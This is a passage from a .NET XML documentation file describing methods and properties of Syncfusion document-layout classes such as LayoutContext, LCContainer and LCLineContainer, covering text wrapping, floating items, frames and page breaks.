            <param name="rect">The rect.</param>
            <param name="vertices">The vertices.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.LineIntersectionPoint(System.Drawing.PointF,System.Drawing.PointF,System.Drawing.PointF,System.Drawing.PointF)">
            <summary>
            Lines the intersection point.
            </summary>
            <param name="ps1">The PS1.</param>
            <param name="pe1">The pe1.</param>
            <param name="ps2">The PS2.</param>
            <param name="pe2">The pe2.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsWrapPolygonDenotesRectangle(System.Collections.Generic.List{System.Drawing.PointF},System.Single@,System.Single@,System.Single@,System.Single@)">
            <summary>
            Determines whether [is wrap polygon denotes rectangle] [the specified vertices].
            </summary>
            <param name="vertices">The vertices.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateParagraphXPositionBasedOnTextWrap(Syncfusion.DocIO.DLS.WParagraph,System.Single,System.Single)">
            <summary>
            Update X position of the paragraph based on TextWrap
            </summary>
            <param name="childWidget"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsNeedToUpdateParagraphYPosition(System.Single,Syncfusion.DocIO.DLS.TextWrappingStyle,Syncfusion.DocIO.DLS.WParagraph,System.Single,System.Single)">
            <summary>
            Determines whether the paragraph mark position need to update to the bottom.
            </summary>
            <param name="yPosition">The y position.</param>
            <param name="textWrappingStyle">The text wrapping style.</param>
            <param name="paragraph">The paragraph.</param>
            <param name="size">The size.</param>
            <param name="bottomPosition">The bottom position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsFloatingItemIntersectParaMark(System.Single,System.Single)">
            <summary>
            Determines whether the floating item is intersect the paragraph mark or not.
            </summary>
            <param name="startValue">The start value.</param>
            <param name="endValue">The end value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.AdjustTightAndThroughBounds(Syncfusion.Layouting.FloatingItem,System.Drawing.RectangleF,System.Single)">
            <summary>
            Adjusts the tight and through bounds.
            </summary>
            <param name="currTextRange">The curr text range.</param>
            <param name="size">The size.</param>
            <param name="rect">The rect.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsLineSlopeIsLeftToRight(System.Drawing.PointF,System.Drawing.PointF)">
            <summary>
            Determines whether [is line slope is left to right] [the specified first point].
            </summary>
            <param name="firstPoint">The first point.</param>
            <param name="secondPoint">The second point.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.pnpoly(System.Drawing.PointF[],System.Drawing.PointF)">
            <summary>
            Pnpolies the specified poly.
            </summary>
            <param name="poly">The poly.</param>
            <param name="pnt">The PNT.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateParagraphYPositionBasedonTextWrap">
            <summary>
            Update Paragraph Y position based on TextWrap
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateXYPositionBasedOnAdjacentFloatingItems(System.Collections.Generic.List{Syncfusion.Layouting.FloatingItem},System.Drawing.RectangleF,System.Drawing.SizeF,Syncfusion.DocIO.DLS.WParagraph,System.Boolean)">
            <summary>
            Update the X and Y positions based on the floating items present in the same Y region.
            </summary>
            <param name="floatingItems"> Y position sorted floating item collections</param>
            <param name="rect">Current layouting area</param>
            <param name="size">size of the widget</param>
            <param name="ownerParagraph">current pargraph</param>
            <param name="isFromLeafLayoutContext">Determine whether this is called from leaf layout context class or not</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateYPosition(System.Collections.Generic.List{Syncfusion.Layouting.FloatingItem},System.Drawing.RectangleF,System.Drawing.SizeF,Syncfusion.DocIO.DLS.WParagraph,System.Boolean)">
            <summary>
            Update the client area Y position with minimum bottom position of the floating items
            </summary>
            <param name="interSectingItems"></param>
            <param name="rect"></param>
            <param name="size"></param>
            <param name="paragraph"></param>
            <param name="isFromLeafLayoutContext"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetMinWidth(Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            Get the minimum width.
            </summary>
            <param name="textWrappingStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetWordVersion(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Return the document Word version in the format of string.
            </summary>
            <param name="paragraph">current paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetMinWidthBetweenFloatingItems(Syncfusion.DocIO.DLS.TextWrappingStyle,Syncfusion.DocIO.DLS.TextWrappingStyle,System.String)">
            <summary>
            Return the minimum size required between two floating items based on Word version and floating item wrapping type.
            </summary>
            <param name="leftStyle">Left side floating item wrapping style</param>
            <param name="rightStyle">Right side floating item wrapping style</param>
            <param name="paragraph">current paragraph</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsSquareOrTightAndThrow(Syncfusion.Layouting.FloatingItem)">
            <summary>
            Check whether floating item wrapping style is square or tight and throw
            </summary>
            <param name="floatingItem"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsYPositionIntersect(System.Drawing.RectangleF,System.Drawing.RectangleF,System.Single)">
            <summary>
            Check whether Y position intersect or not
            </summary>
            <param name="floatingItemBounds"></param>
            <param name="currentItemBounds"></param>
            <param name="height"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetBottomPositionForTightAndThrough(System.Single,System.Drawing.RectangleF,Syncfusion.DocIO.DLS.WParagraph,System.Single,System.Single)">
            <summary>
            Gets the bottom position for tight and through.
            </summary>
            <param name="floattingItemBottomPosition">The floatting item bottom position.</param>
            <param name="textWrappingBounds">The text wrapping bounds.</param>
            <param name="paragraph">The paragraph.</param>
            <param name="yPostion">The y postion.</param>
            <param name="leafWidget">The leaf widget.</param>
            <param name="leafWidgetHeight">Height of the leaf widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetMultipleFactorValue(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the height of the floatting item.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetFloattingItemBottom(Syncfusion.DocIO.DLS.Entity,System.Single)">
            <summary>
            Gets the height of the floatting item.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetExceededBottomValueForTightAndThrough(System.Single,System.Single,System.Single,Syncfusion.DocIO.DLS.WParagraph,System.Boolean)">
            <summary>
            Gets the exceeded bottom value for tight and through.
            </summary>
            <param name="yPosition">The height.</param>
            <param name="multipleFactorValue">Height of the break character.</param>
            <param name="paragraph">The para.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetPreviousParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the previous paragraph.
            </summary>
            <param name="paragrph">The paragrph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetPreviousParagraphIsInSDTContent(Syncfusion.DocIO.DLS.StructureDocumentTagBlock)">
            <summary>
            Gets the content of the previous paragraph is in SDT.
            </summary>
            <param name="sdtContent">Content of the SDT.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetPreviousParagraphIsInTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Gets the previous paragraph is in table.
            </summary>
            <param name="table">The table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetFloattingItemIndex(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determine whether the paragraph is in textbox and wrapping added to the collection or not
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsInFootnote(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determine whether the paragraph is in footnote
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsInTextBox(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determine whether the paragraph is in footnote
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetPageMarginLeft(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Get Left Margin of the Page
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateParagraphTopMargin(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Update Top Margin of the paragraph
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsTOC(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Checks whether the paragraph is a TOC
            </summary>
            <param name="txtRange">Text Range</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsPageBreak(Syncfusion.Layouting.IWidget)">
            <summary>
            Check whether the current widget is have page break
            </summary>
            <param name="childWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsSectionBreak(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determine the whether the paragraph is have section break
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.CreateLayoutArea(System.Drawing.RectangleF,Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Creates the layout area.
            </summary>
            <param name="rect">The rect.</param>
            <param name="cellPadding">The cell padding.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.CreateLayoutedWidget(System.Drawing.PointF)">
            <summary>
            Creates the layouted widget.
            </summary>
            <param name="location">The location.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateAreaWidth(System.Single)">
            <summary>
            Updates the width of client area and client active area
            </summary>
            <param name="width">width.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.Create(Syncfusion.Layouting.IWidget,Syncfusion.Layouting.ILCOperator,System.Single)">
            <summary>
            Creates the specified widget.
            </summary>
            <param name="widget">The widget.</param>
            <param name="lcOperator">The lc operator.</param>
            <param name="width">The width of current lay out area.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsInFrame(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determines whether the specified paragraph is in frame.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns>
            	<c>true</c> if [is in frame] [the specified paragraph]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetFrameBounds(Syncfusion.DocIO.DLS.WParagraph,System.Drawing.RectangleF)">
            <summary>
            Gets the Location of frame and draw the frame content.
            </summary>
            <param name="dc">dc.</param>
            <param name="ltWidget">ltWidget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetBaseTextBody(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get Base Entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get Base Entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsBaseFromSection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether it's base from section for the specified entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsInTable(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether given entity is in table or not.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetPositionX(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WSection,System.Drawing.RectangleF,System.Single)">
            <summary>
            Positions the X.
            </summary>
            <param name="paraFormat">The para format.</param>
            <param name="section">The section.</param>
            <param name="bounds">The bounds.</param>
            <param name="frameWidth">Width of the frame.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetPositionY(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WSection,System.Drawing.RectangleF,System.Single)">
            <summary>
            Gets the Y Position of frame.
            </summary>
            <param name="paraFormat">paraformat.</param>
            <param name="section">section.</param>
            <param name="bounds">The bounds.</param>
            <param name="frameHeight">Height of the frame.</param>
            <returns></returns>
            ///
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.SplittedWidget">
            <summary>
            Gets the splitted widget.
            </summary>
            <value>The splitted widget.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.State">
            <summary>
            Gets the layouted state.
            </summary>
            <value>The state.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.LayoutInfo">
            <summary>
            Gets the layout info.
            </summary>
            <value>The layout info.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.LayoutArea">
            <summary>
            Gets the layout area.
            </summary>
            <value>The layout area.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.DrawingContext">
            <summary>
            Gets the drawing context.
            </summary>
            <value>The drawing context.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.BoundsPaddingRight">
            <summary>
            Gets the bounds padding right.
            </summary>
            <value>The bounds padding right.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.BoundsPaddingBottom">
            <summary>
            Gets the bounds padding bottom.
            </summary>
            <value>The bounds padding bottom.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.Widget">
            <summary>
            Gets the widget.
            </summary>
            <value>The widget.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.IsVerticalNotFitted">
            <summary>
            Gets or sets a value indicating whether this instance is vertical not fitted.
            </summary>
            <value>
            <c>true</c> if this instance is vertical not fitted; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.IsInnerLayouting">
            <summary>
            Gets or sets a value indicating whether to skip splitted Paragraph
            </summary>
            <value>
              <c>true</c> if the splitted Paragraph to skip; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.IsAreaUpdated">
            <summary>
            Gets or sets a value indicating whether the  Area is Updated
            </summary>
            <value>
              <c>true</c> if the Area is Updated; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.IsTabStopBeyondRightMarginExists">
            <summary>
            Gets or sets a value indicating whether the tab with stop position beyond right margin exists or not
            </summary>
            <value>
              <c>true</c> if the Tab with stop position beyond right margin exists; otherwise, <c>false</c>.
            </value>        
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.IsNeedToWrap">
            <summary>
            Gets or sets a value indicating whether this instance need to wrap
            </summary>
            <value>
              <c>true</c> if this instance need wrap
            </value>   
        </member>
        <member name="P:Syncfusion.Layouting.LayoutContext.ClientLayoutAreaRight">
            <summary>
            Gets or sets the client layout area right.
            </summary>
            <value>
            The client active layout right.
            </value>
        </member>
        <member name="T:Syncfusion.Layouting.LCContainer">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LCContainer.m_curWidgetIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LCContainer.m_currChildLW">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LCContainer.m_bAtLastOneChildFitted">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.#ctor(Syncfusion.Layouting.IWidgetContainer,Syncfusion.Layouting.ILCOperator)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LCContainer"/> class.
            </summary>
            <param name="widget">The widget.</param>
            <param name="lcOperator">The lc operator.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.Layout(System.Drawing.RectangleF)">
            <summary>
            Layouts the specified widget.
            </summary>
            <param name="rect">The rect.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.CreateNextChildContext">
            <summary>
            Creates the next child context.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsNeedToSkipMovingBreakItem(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determine whether the page break is need to move last item of para or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateExpressionField(Syncfusion.Layouting.IWidget)">
            <summary>
            Updates the expression field.
            </summary>
            <param name="childWidget">The child widget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.CheckNullConditionAndReturnltwidget">
            <summary>
            Checks the null condition and returnltwidget.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.FindIntersectPointAndRemovltWidgetForTable">
            <summary>
            Finds the intersect point and removlt widget.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.LayoutFootnoteSplittedWidgets(Syncfusion.Layouting.IWidget)">
            <summary>
            Layout splitted footnote textbody
            </summary>
            <param name="childWidget"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.LayoutEndnoteSplittedWidgets(Syncfusion.Layouting.IWidget)">
            <summary>
            Layout splitted endtnote textbody
            </summary>
            <param name="childWidget"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsParagraphSplittedByPageBreak(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Check whether pararagph splitted by Page break or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsPreviousParagraphHaveSectionBreak(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Check whether previous paragraph have section break or not.
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsHeaderContentExceedsTopMargin">
            <summary>
            Need to skip updating top margin as zero when its header contents exceeds page top margin height
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateTextBodyItemPosition(Syncfusion.Layouting.IWidget)">
            <summary>
            Update the text body items positio
            </summary>
            <param name="childWidget"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.GetFootnoteHeight">
            <summary>
            Getting the footnote height
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateParagraphMargins(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Update paragraph Top and Bottom Margins
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.MarkAsNotFitted(Syncfusion.Layouting.LayoutContext,System.Boolean)">
            <summary>
            Marks as not fitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsPageBreakInTable(Syncfusion.Layouting.IWidget)">
            <summary>
            Checks whether page break is present inside the table
            </summary>
            <param name="LeafWidget"></param>
            <remarks>If it is present inside the table, it will not be considered during Doc to PDF conversion.</remarks>
            <returns>bool</returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.MarkAsFitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as fitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.MarkAsWrapText(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as Wrap Text.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.MarkAsSplitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as splitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateSplittedWidgetIndex(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Upddate index of split string widget to perform text wrap
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.MarkAsBreaked(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as breaked.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateClientArea">
            <summary>
            Updates the client area.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateSpacingInfo(System.Drawing.RectangleF)">
            <summary>
            Updates the spacing information.
            </summary>
            <param name="bounds">The bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsNextTextBodyItemIsParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determines whether the next text body item is paragraph or not.
            </summary>
            <param name="paragraph">The para.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsInFrame(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Determines whether the specified table is in frame.
            </summary>
            <param name="table">The table.</param>
            <returns>
            	<c>true</c> if the specified table is in frame; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateFrameBounds(System.Drawing.RectangleF,System.Boolean)">
            <summary>
            Updates the frame bounds.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.ChangeChildsAlignment">
            <summary>
            Changes the childs alignment.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.NextChildWidget">
            <summary>
            Nexts the child widget.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.SplitedUpWidget(Syncfusion.Layouting.IWidget,System.Boolean)">
            <summary>
            Spliteds up widget.
            </summary>
            <param name="splitWidget">The split widget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.SaveChildContextState(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Commits the child context.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.DoLayoutChild(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Layouted current child
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsNeedToUpdateFloatingEntityBounds(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Return true if entity wrapping style is tight or throw
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.GetFloatingItemFromCollection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Return the floating item from its floating item collection.
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.AddChildLW(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Adds the child LW.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.SplitEndNoteWidgets">
            <summary>
             //if the split widget container have the Endnote item  set the empty section in split widget container and change the state to the splitted for layout the Endnote textbody at the second page.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.AddBehindWidgets(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Add Behind widgets to the collection
            </summary>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.CheckWidgetWrappingType(Syncfusion.Layouting.IWidget)">
            <summary>
            Checks the type of the widget.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.CheckWidgetWrappingTypeAndHorizontalOrigin(Syncfusion.Layouting.IWidget)">
            <summary>
            Checks the widget wrapping type and horizontal origin.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.CheckWrappingTypeAndHorizontalOrigin(Syncfusion.DocIO.DLS.TextWrappingStyle,Syncfusion.DocIO.DLS.HorizontalOrigin)">
            <summary>
            Checks the wrapping type and horizontal origin.
            </summary>
            <param name="textWrappingStyle">The text wrapping style.</param>
            <param name="horizontalOrigin">The horizontal origin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateLWBounds(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Updates the LW bounds.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsBottomPositionNeedToBeUpdate(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Determine whether the layouted widget bottom position is need to be updated or not
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.AddFrameBounds">
            <summary>
            Add Frame Bounds into the text box bounds collection
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateFrameBounds(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Updates the frame bounds.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateFrameBounds(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Updates the frame bounds.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateHorizontalAlignment(System.Int16)">
            <summary>
            Updates the horizontal alignment.
            </summary>
            <param name="xAlginment">The x alginment.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.UpdateVerticalAlignment(System.Int16)">
            <summary>
            Updates the vertical alignment.
            </summary>
            <param name="yAlginment">The y alginment.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.CommitKeepWithNext(Syncfusion.Layouting.IWidget@)">
            <summary>
            Commits the keep with next.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.CommitWithKeepWithNexForWord2013Format(Syncfusion.Layouting.IWidget@,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Commits the with keep with nex for word2013 format.
            </summary>
            <param name="splittedWidget">The splitted widget.</param>
            <param name="section">The section.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.RemoveItemsFromltWidgets(Syncfusion.Layouting.IWidget@)">
            <summary>
            Removes the items from lt widgets.
            </summary>
            <param name="splittedWidget">The splitted widget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsAllTextBodyItemHavingKeepWithNext">
            <summary>
            Gets the owner section.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCContainer.IsNeedToCommitKeepWithNext">
            <summary>
            Determine whether current widget is need to commit Keep with next property.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.LCContainer.WidgetContainer">
            <summary>
            Gets the widget container.
            </summary>
            <value>The widget container.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LCContainer.CurrentChildWidget">
            <summary>
            Gets the current child widget.
            </summary>
            <value>The current child widget.</value>
        </member>
        <member name="T:Syncfusion.Layouting.LCLineContainer">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.#ctor(Syncfusion.Layouting.IWidgetContainer,Syncfusion.Layouting.ILCOperator)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LCLineContainer"/> class.
            </summary>
            <param name="container">The container.</param>
            <param name="lcOperator">The lc operator.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.DoLayoutChild(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Layouted current child
            </summary>
            <param name="childContext"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.CreateNextChildContext">
            <summary>
            Creates the next child context.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.MarkAsNotFitted(Syncfusion.Layouting.LayoutContext,System.Boolean)">
            <summary>
            Commits for not fitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsLineContainOnlyNonRenderableItem(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            check whether line have only non drawing items or not
            </summary>
            <param name="lineWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsEndPage(Syncfusion.DocIO.DLS.WParagraph,System.Boolean)">
            <summary>
            To check this paragraph is end of page, when page layout contains more than one column
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsNeedToResetSplitWidget(Syncfusion.Layouting.LayoutContext,Syncfusion.DocIO.DLS.WParagraph,System.Boolean)">
            <summary>
            Determine whether the splitted widget need to be reset based on WindowControl
            </summary>
            <param name="childContext"></param>
            <param name="isWidowControl"></param>
            <param name="isSplittedLine"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.UpdateFootnoteWidgets">
            <summary>
            Update footnote widgets
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsKeepLineTogether(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Determine whether is KeepLineTogether
            </summary>
            <param name="childContext"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsLastParagraphNeedToBeLayout(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Determine whether the last paragraph is need to be layout in Next page
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsParagraphContainsBookMarksOnly">
            <summary>
            Determine whether the paragraph contains only bookmarks alone.
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
